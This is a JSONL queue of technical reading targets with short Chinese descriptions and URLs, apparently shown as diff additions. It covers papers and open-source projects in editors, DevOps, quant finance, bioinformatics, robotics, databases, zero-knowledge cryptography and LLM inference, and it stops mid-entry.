+{"slug":"nvim-treesitter","area":"projects","topic":"editors-ide","title":"nvim-treesitter","meta":{"col3":"2024","col4":"Neovim 的 tree-sitter 集成;现代语法高亮事实标准"},"url":"https://github.com/nvim-treesitter/nvim-treesitter","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"cody-sourcegraph","area":"projects","topic":"editors-ide","title":"Cody","meta":{"col3":"2024","col4":"Sourcegraph;代码搜索 + LLM agent,企业级 AI 编辑器"},"url":"https://github.com/sourcegraph/cody","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"kakoune-editor","area":"projects","topic":"editors-ide","title":"Kakoune","meta":{"col3":"2024","col4":"选择优先模态编辑器;Helix 的灵感来源"},"url":"https://github.com/mawww/kakoune","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"emacs-magit","area":"projects","topic":"editors-ide","title":"Magit","meta":{"col3":"2024","col4":"Emacs git porcelain;最被效仿的 Git UI"},"url":"https://github.com/magit/magit","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"warp-terminal","area":"projects","topic":"editors-ide","title":"Warp Terminal","meta":{"col3":"2024","col4":"Rust + GPU 渲染终端;blocks/AI 命令补全"},"url":"https://github.com/warpdotdev/Warp","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"chaos-engineering-netflix-2016","area":"papers","topic":"business-engineering","title":"Chaos Engineering: Netflix's Approach","meta":{"col3":"2016","col4":"Basiri 等 IEEE Software;故障注入工程化的奠基"},"url":"https://arxiv.org/abs/1702.05843","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:02:07.332Z"} +{"slug":"dora-state-of-devops-2023","area":"papers","topic":"business-engineering","title":"DORA State of DevOps Report 2023","meta":{"col3":"2023","col4":"Google DORA;四大指标 + 平台工程的最新基准"},"url":"https://services.google.com/fh/files/misc/2023_state_of_devops_report.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:07:10.431Z"} +{"slug":"incident-command-system-2022","area":"papers","topic":"business-engineering","title":"Incident Command System for Tech Operations","meta":{"col3":"2022","col4":"PagerDuty/Google SRE 摘录;事件响应组织模式"},"url":"https://response.pagerduty.com/training/incident_commander/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"backstage-spotify-2020","area":"papers","topic":"business-engineering","title":"Backstage: Spotify's Internal Developer Portal","meta":{"col3":"2020","col4":"Spotify;平台工程 IDP 概念落地的代表"},"url":"https://backstage.io/blog/2020/03/16/announcing-backstage/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"argo-cd","area":"projects","topic":"business-engineering","title":"Argo CD","meta":{"col3":"2024","col4":"GitOps 事实标准;K8s 声明式部署"},"url":"https://github.com/argoproj/argo-cd","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"flux-cd","area":"projects","topic":"business-engineering","title":"Flux CD","meta":{"col3":"2024","col4":"Argo CD 之外的另一 GitOps 主流方案"},"url":"https://github.com/fluxcd/flux2","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"kratos-ory","area":"projects","topic":"business-engineering","title":"Ory Kratos","meta":{"col3":"2024","col4":"云原生身份基础设施;OAuth/OIDC 自托管"},"url":"https://github.com/ory/kratos","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"crossplane","area":"projects","topic":"business-engineering","title":"Crossplane","meta":{"col3":"2024","col4":"K8s 风格的多云控制面;Terraform 的声明式替代"},"url":"https://github.com/crossplane/crossplane","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"kelly-criterion-1956","area":"papers","topic":"quant-finance","title":"A New Interpretation of Information Rate (Kelly Criterion)","meta":{"col3":"1956","col4":"Kelly;最优下注比例的奠基,量化仓位管理基石"},"url":"https://www.princeton.edu/~wbialek/rome/refs/kelly_56.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:07:10.561Z"} +{"slug":"black-scholes-1973","area":"papers","topic":"quant-finance","title":"The Pricing of Options and Corporate Liabilities","meta":{"col3":"1973","col4":"Black/Scholes;期权定价模型奠基论文,金融工程必读"},"url":"https://www.cs.princeton.edu/courses/archive/fall09/cos323/papers/black_scholes73.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"almgren-chriss-2001","area":"papers","topic":"quant-finance","title":"Optimal Execution of Portfolio Transactions","meta":{"col3":"2001","col4":"Almgren/Chriss;最优执行算法的奠基,VWAP/TWAP 后续都基于此"},"url":"https://www.smallake.kr/wp-content/uploads/2016/03/optliq.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"lopez-de-prado-trio-2018","area":"papers","topic":"quant-finance","title":"The 10 Reasons Most Machine Learning Funds Fail","meta":{"col3":"2018","col4":"López de Prado JPM;ML 用于金融的工程坑全记录"},"url":"https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3104816","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"nautilus-trader","area":"projects","topic":"quant-finance","title":"Nautilus Trader","meta":{"col3":"2024","col4":"高性能 Rust 量化回测/实盘平台,事件驱动"},"url":"https://github.com/nautechsystems/nautilus_trader","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"qlib-microsoft","area":"projects","topic":"quant-finance","title":"Qlib","meta":{"col3":"2024","col4":"微软亚研;AI 驱动的量化研究平台,A 股因子库"},"url":"https://github.com/microsoft/qlib","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"freqtrade","area":"projects","topic":"quant-finance","title":"Freqtrade","meta":{"col3":"2024","col4":"开源加密货币量化交易机器人,最广用"},"url":"https://github.com/freqtrade/freqtrade","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"hummingbot","area":"projects","topic":"quant-finance","title":"Hummingbot","meta":{"col3":"2024","col4":"做市商和 DEX 量化机器人开源框架"},"url":"https://github.com/hummingbot/hummingbot","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"vectorbt","area":"projects","topic":"quant-finance","title":"vectorbt","meta":{"col3":"2024","col4":"向量化回测 Python 库;NumPy 极致性能策略评估"},"url":"https://github.com/polakowo/vectorbt","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"awesome-systematic-trading","area":"projects","topic":"quant-finance","title":"awesome-systematic-trading","meta":{"col3":"2024","col4":"量化资源 awesome list;策略 + 数据 + 平台"},"url":"https://github.com/edarchimbaud/awesome-systematic-trading","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"blast-altschul-1990","area":"papers","topic":"bioinformatics","title":"Basic Local Alignment Search Tool (BLAST)","meta":{"col3":"1990","col4":"Altschul 等;序列比对工具的奠基,最被引用论文之一"},"url":"https://www.sciencedirect.com/science/article/abs/pii/S0022283605803602","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"smith-waterman-1981","area":"papers","topic":"bioinformatics","title":"Identification of Common Molecular Subsequences","meta":{"col3":"1981","col4":"Smith/Waterman;局部序列比对动态规划算法"},"url":"https://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rosettafold-2021","area":"papers","topic":"bioinformatics","title":"Accurate Prediction of Protein Structures and Interactions (RoseTTAFold)","meta":{"col3":"2021","col4":"Baek 等 Science;AlphaFold2 同期独立工作"},"url":"https://www.science.org/doi/10.1126/science.abj8754","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"esmfold-2022","area":"papers","topic":"bioinformatics","title":"Evolutionary-Scale Prediction of Atomic-Level Protein Structure","meta":{"col3":"2022","col4":"Meta ESMFold;语言模型从单序列预测结构"},"url":"https://www.science.org/doi/10.1126/science.ade2574","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"biopython","area":"projects","topic":"bioinformatics","title":"Biopython","meta":{"col3":"2024","col4":"Python 生信事实标准库;Seq/Bio.PDB/Bio.Blast"},"url":"https://github.com/biopython/biopython","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"samtools-htslib","area":"projects","topic":"bioinformatics","title":"samtools / htslib","meta":{"col3":"2024","col4":"BAM/CRAM 格式标准实现;测序数据处理基石"},"url":"https://github.com/samtools/samtools","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"snakemake","area":"projects","topic":"bioinformatics","title":"Snakemake","meta":{"col3":"2024","col4":"Python DSL 的工作流管理;最广用生信 pipeline 工具"},"url":"https://github.com/snakemake/snakemake","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"nextflow","area":"projects","topic":"bioinformatics","title":"Nextflow","meta":{"col3":"2024","col4":"DSL2;Snakemake 的竞争方案,nf-core 社区强大"},"url":"https://github.com/nextflow-io/nextflow","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"scanpy","area":"projects","topic":"bioinformatics","title":"Scanpy","meta":{"col3":"2024","col4":"Python 单细胞分析;Seurat 的 Python 对手"},"url":"https://github.com/scverse/scanpy","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rdkit","area":"projects","topic":"bioinformatics","title":"RDKit","meta":{"col3":"2024","col4":"开源化学信息学库;分子指纹/SMILES/RDKit 是化学 AI 基础"},"url":"https://github.com/rdkit/rdkit","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rt-1-2022","area":"papers","topic":"robotics-VLA","title":"RT-1: Robotics Transformer for Real-World Control at Scale","meta":{"col3":"2022","col4":"Google;机器人 transformer 的奠基,VLA 范式起点"},"url":"https://arxiv.org/abs/2212.06817","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rt-2-2023","area":"papers","topic":"robotics-VLA","title":"RT-2: Vision-Language-Action Models","meta":{"col3":"2023","col4":"Google DeepMind;VLM 直接输出动作 token,VLA 概念诞生"},"url":"https://arxiv.org/abs/2307.15818","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"openvla-2024","area":"papers","topic":"robotics-VLA","title":"OpenVLA: An Open-Source Vision-Language-Action Model","meta":{"col3":"2024","col4":"Stanford;首个开源 7B VLA,社区基线"},"url":"https://arxiv.org/abs/2406.09246","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"octo-2024","area":"papers","topic":"robotics-VLA","title":"Octo: An Open-Source Generalist Robot Policy","meta":{"col3":"2024","col4":"BAIR;diffusion policy + transformer 的通用机器人"},"url":"https://arxiv.org/abs/2405.12213","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rt-x-2023","area":"papers","topic":"robotics-VLA","title":"Open X-Embodiment: Robotic Learning Datasets and RT-X Models","meta":{"col3":"2023","col4":"21 实验室联合;跨实体数据集合作的里程碑"},"url":"https://arxiv.org/abs/2310.08864","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"pi0-physical-intelligence-2024","area":"papers","topic":"robotics-VLA","title":"π0: A Vision-Language-Action Flow Model for General Robot Control","meta":{"col3":"2024","col4":"Physical Intelligence;flow matching + VLA,性能 SOTA"},"url":"https://arxiv.org/abs/2410.24164","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"lerobot","area":"projects","topic":"robotics-VLA","title":"LeRobot","meta":{"col3":"2024","col4":"HuggingFace;机器人版 transformers,VLA 训练/部署事实标准"},"url":"https://github.com/huggingface/lerobot","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"isaac-lab-nvidia","area":"projects","topic":"robotics-VLA","title":"Isaac Lab","meta":{"col3":"2024","col4":"NVIDIA;Isaac Sim 上的机器人学习框架,GPU 并行仿真"},"url":"https://github.com/isaac-sim/IsaacLab","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"mujoco-deepmind","area":"projects","topic":"robotics-VLA","title":"MuJoCo","meta":{"col3":"2024","col4":"DeepMind 开源后;机器人物理仿真事实标准"},"url":"https://github.com/google-deepmind/mujoco","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"awesome-robotics-fm","area":"projects","topic":"robotics-VLA","title":"awesome-robotics-foundation-models","meta":{"col3":"2024","col4":"VLA/RT-X/世界模型资源汇总"},"url":"https://github.com/JeffreyYH/Awesome-Generalist-Robots-via-Foundation-Models","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"photon-databricks-2022","area":"papers","topic":"database-modern","title":"Photon: A Fast Query Engine for Lakehouse Systems","meta":{"col3":"2022","col4":"Databricks SIGMOD'22;C++ 向量化引擎,lakehouse 商业代表"},"url":"https://people.eecs.berkeley.edu/~matei/papers/2022/sigmod_photon.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"umbra-2020","area":"papers","topic":"database-modern","title":"Umbra: A Disk-Based System with In-Memory Performance","meta":{"col3":"2020","col4":"Neumann TUM;HyPer 的继任者,编译执行 + 列存"},"url":"https://www.cidrdb.org/cidr2020/papers/p29-neumann-cidr20.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"iceberg-2020","area":"papers","topic":"database-modern","title":"Apache Iceberg: A High-Performance Table Format","meta":{"col3":"2020","col4":"Netflix;现代 lakehouse 的事实表格式标准"},"url":"https://iceberg.apache.org/spec/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"delta-lake-2020","area":"papers","topic":"database-modern","title":"Delta Lake: High-Performance ACID Table Storage over Cloud Object Stores","meta":{"col3":"2020","col4":"Databricks VLDB'20;lakehouse 事务层奠基"},"url":"https://www.vldb.org/pvldb/vol13/p3411-armbrust.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"hudi-uber-2017","area":"papers","topic":"database-modern","title":"Apache Hudi: Incremental Processing on Big Data","meta":{"col3":"2017","col4":"Uber;和 Iceberg/Delta 三足鼎立的表格式"},"url":"https://hudi.apache.org/docs/concepts","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"datafusion-arrow","area":"projects","topic":"database-modern","title":"Apache DataFusion","meta":{"col3":"2024","col4":"Rust 写的查询引擎;Arrow 生态核心,被 InfluxDB/Ballista 用"},"url":"https://github.com/apache/datafusion","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"lance-format","area":"projects","topic":"database-modern","title":"Lance","meta":{"col3":"2024","col4":"Eto;列存 + 向量索引一体化,AI 时代的 parquet"},"url":"https://github.com/lancedb/lance","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"materialize-streaming","area":"projects","topic":"database-modern","title":"Materialize","meta":{"col3":"2024","col4":"增量计算物化视图;Differential Dataflow 商业化"},"url":"https://github.com/MaterializeInc/materialize","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"paimon-flink","area":"projects","topic":"database-modern","title":"Apache Paimon","meta":{"col3":"2024","col4":"原 Flink Table Store;流批一体的表格式"},"url":"https://github.com/apache/paimon","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"questdb-tsdb","area":"projects","topic":"database-modern","title":"QuestDB","meta":{"col3":"2024","col4":"Java/C++ 时序数据库;高性能金融时间序列"},"url":"https://github.com/questdb/questdb","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"nova-folding-2021","area":"papers","topic":"cryptography-ZK","title":"Nova: Recursive Zero-Knowledge Arguments from Folding Schemes","meta":{"col3":"2021","col4":"Kothapalli/Setty/Tzialla;folding 范式奠基,zkVM 加速核心"},"url":"https://eprint.iacr.org/2021/370","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"halo2-2022","area":"papers","topic":"cryptography-ZK","title":"Halo2: A SNARK Implementation Using PLONK Arithmetization","meta":{"col3":"2022","col4":"Zcash/Electric Coin;无可信 setup 的 PLONK 实现"},"url":"https://zcash.github.io/halo2/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"hyperplonk-2022","area":"papers","topic":"cryptography-ZK","title":"HyperPlonk: PLONK with Linear-time Prover and High-degree Custom Gates","meta":{"col3":"2022","col4":"Chen/Bunz/Boneh;PLONK 系列性能突破"},"url":"https://eprint.iacr.org/2022/1355","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"plookup-2020","area":"papers","topic":"cryptography-ZK","title":"plookup: A Simplified Polynomial Protocol for Lookup Tables","meta":{"col3":"2020","col4":"Gabizon/Williamson;查找表参数化的奠基,所有现代 zkVM 用"},"url":"https://eprint.iacr.org/2020/315","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"risc0-zkvm","area":"projects","topic":"cryptography-ZK","title":"RISC Zero zkVM","meta":{"col3":"2024","col4":"首个生产级 RISC-V zkVM;通用程序的 ZK 证明"},"url":"https://github.com/risc0/risc0","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"sp1-succinct","area":"projects","topic":"cryptography-ZK","title":"SP1","meta":{"col3":"2024","col4":"Succinct Labs;性能领先的 RISC-V zkVM,Rust 友好"},"url":"https://github.com/succinctlabs/sp1","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"circom-iden3","area":"projects","topic":"cryptography-ZK","title":"circom","meta":{"col3":"2024","col4":"iden3;最广用的电路 DSL,Web3 ZK 应用入门"},"url":"https://github.com/iden3/circom","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"noir-aztec","area":"projects","topic":"cryptography-ZK","title":"Noir","meta":{"col3":"2024","col4":"Aztec;Rust 风格 ZK 电路 DSL,比 circom 友好"},"url":"https://github.com/noir-lang/noir","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"arkworks-rs","area":"projects","topic":"cryptography-ZK","title":"arkworks-rs/algebra","meta":{"col3":"2024","col4":"Rust 椭圆曲线/有限域库;ZK 项目通用底座"},"url":"https://github.com/arkworks-rs/algebra","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"awesome-zk-proofs","area":"projects","topic":"cryptography-ZK","title":"awesome-zero-knowledge-proofs","meta":{"col3":"2024","col4":"ZK 论文/工具/教程汇总,研究入口"},"url":"https://github.com/matter-labs/awesome-zero-knowledge-proofs","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"mindie-2024","area":"projects","topic":"ml-systems","title":"MindIE LLM Inference Engine (Ascend)","meta":{"col3":"","col4":"Huawei 昇腾 NPU 上的 LLM 推理引擎;vLLM 在国产硬件路线上的对标方案,理解 dynamic batching + INT8/INT4 量化在非 NVIDIA 栈上的工业实现"},"url":"https://www.hiascend.com/software/mindie","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"lmdeploy","area":"projects","topic":"ml-systems","title":"LMDeploy: InternLM team inference toolkit","meta":{"col3":"","col4":"上海 AI Lab;TurboMind backend + INT4 KV cache 独家;理解 vLLM 之外的国产 LLM serving 方案"},"url":"https://github.com/InternLM/lmdeploy","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"flexgen-2023","area":"papers","topic":"ml-systems","title":"FlexGen: High-throughput Generative Inference of LLMs with a Single GPU","meta":{"col3":"","col4":"Stanford ICML'23;CPU/disk KV offload 的奠基论文,dossier 中作为离线场景候选"},"url":"https://arxiv.org/abs/2303.06865","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"kserve","area":"projects","topic":"ml-systems","title":"KServe: Kubernetes-native model serving","meta":{"col3":"","col4":"K8s 上的标准化模型服务接口;vLLM 工业部署 dossier 提到的 K8s 选项,对标 Ray Serve"},"url":"https://github.com/kserve/kserve","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"ray-serve","area":"projects","topic":"ml-systems","title":"Ray Serve: scalable model serving","meta":{"col3":"","col4":"Anyscale;分布式 actor 模型支撑的 LLM serving 框架,vLLM 集成路径之一"},"url":"https://docs.ray.io/en/latest/serve/index.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"deepspeed-inference-2022","area":"papers","topic":"ml-systems","title":"DeepSpeed-Inference: Enabling Efficient Inference of Transformer Models at Unprecedented Scale","meta":{"col3":"","col4":"微软;ZeRO-Inference + Tensor Parallel 的工业实现,vLLM/TGI 之前的主流选择"},"url":"https://arxiv.org/abs/2207.00032","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"machete-kernel-vllm","area":"projects","topic":"ml-systems","title":"vLLM Machete W4A16 kernel","meta":{"col3":"","col4":"vLLM 团队为 Hopper 优化的 W4A16 kernel,比 Marlin 快;阅读源码理解 mma instruction layout"},"url":"https://github.com/vllm-project/vllm/blob/main/csrc/quantization/machete/README.md","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"marlin-w4a16-kernel","area":"papers","topic":"ml-systems","title":"Marlin: a fast 4-bit GPTQ-style kernel","meta":{"col3":"","col4":"ISTA/DASLab;A100/H100 W4A16 kernel 加速 GPTQ/AWQ 推理 4 倍;vLLM 默认 quant kernel 之一"},"url":"https://github.com/IST-DASLab/marlin","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"lookahead-decoding-2024","area":"papers","topic":"ml-systems","title":"Break the Sequential Dependency: Lookahead Decoding (Jacobi)","meta":{"col3":"","col4":"LMSYS;无需 draft model 的并行解码,把 Jacobi 迭代搬到 LLM 推理;与 EAGLE/Medusa 同位竞争"},"url":"https://arxiv.org/abs/2402.02057","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"attention-sinks-2024","area":"papers","topic":"ml-systems","title":"Efficient Streaming Language Models with Attention Sinks (StreamingLLM)","meta":{"col3":"","col4":"MIT/Meta;通过保留前几个 token 作 sink 实现无限 streaming;长上下文推理标配"},"url":"https://arxiv.org/abs/2309.17453","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"yarn-rope-2023","area":"papers","topic":"ml-systems","title":"YaRN: Efficient Context Window Extension of Large Language Models","meta":{"col3":"","col4":"Nous Research;NTK-aware RoPE scaling 把 4k 模型扩到 128k;Llama-3 长上下文路线"},"url":"https://arxiv.org/abs/2309.00071","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"h2o-token-eviction-2023","area":"papers","topic":"ml-systems","title":"H2O: Heavy-Hitter Oracle for Efficient Generative Inference of LLMs","meta":{"col3":"","col4":"UT Austin NeurIPS'23;KV cache 重要性评分驱逐策略;长上下文 OOM 场景的工业方案"},"url":"https://arxiv.org/abs/2306.14048","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"scissorhands-2023","area":"papers","topic":"ml-systems","title":"Scissorhands: Exploiting the Persistence of Importance Hypothesis for LLM KV Cache Compression","meta":{"col3":"","col4":"Rice University NeurIPS'23;与 H2O 同期的 KV 驱逐方案,重要性假设的另一条路线"},"url":"https://arxiv.org/abs/2305.17118","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"compressed-tensors-vllm","area":"projects","topic":"ml-systems","title":"compressed-tensors: vLLM 量化模型格式","meta":{"col3":"","col4":"Neural Magic;vLLM 官方量化权重格式(FP8/INT8/W4A16),HF 上 RedHatAI 仓库主要载体"},"url":"https://github.com/neuralmagic/compressed-tensors","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"specbench-2024","area":"papers","topic":"ml-systems","title":"Spec-Bench: Comprehensive Benchmark for Speculative Decoding","meta":{"col3":"","col4":"PKU;EAGLE/Medusa/Lookahead/SpecInfer 横向对比的标准 benchmark;阅读后能快速选 spec 方案"},"url":"https://arxiv.org/abs/2401.07851","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"vllm"} +{"slug":"cohere-embed-v3-2023","area":"projects","topic":"info-retrieval","title":"Cohere Embed v3 (multilingual + compressed embedding)","meta":{"col3":"","col4":"Cohere 商业 embedding;int8/binary embedding 工业代表;与 OpenAI text-embedding-3 同位选项"},"url":"https://cohere.com/blog/introducing-embed-v3","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"data"} +{"slug":"astro-starlight","area":"projects","topic":"frontend","title":"Astro Starlight (docs starter)","meta":{"col3":"","col4":"Astro 官方文档站模板;代替 Docusaurus 的轻量替代,dossier devtool 里的标准选项"},"url":"https://starlight.astro.build/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r4-cookbook-gap-2026-05-31","priority_tier":"cookbook-must","lens_origin":"devtool"} +{"slug":"drizzle-orm","area":"projects","topic":"backend","title":"Drizzle ORM (TypeScript SQL builder)","meta":{"col3":"","col4":"TypeScript-first ORM;与 Prisma 同位竞争,类型推导更轻量;dossier 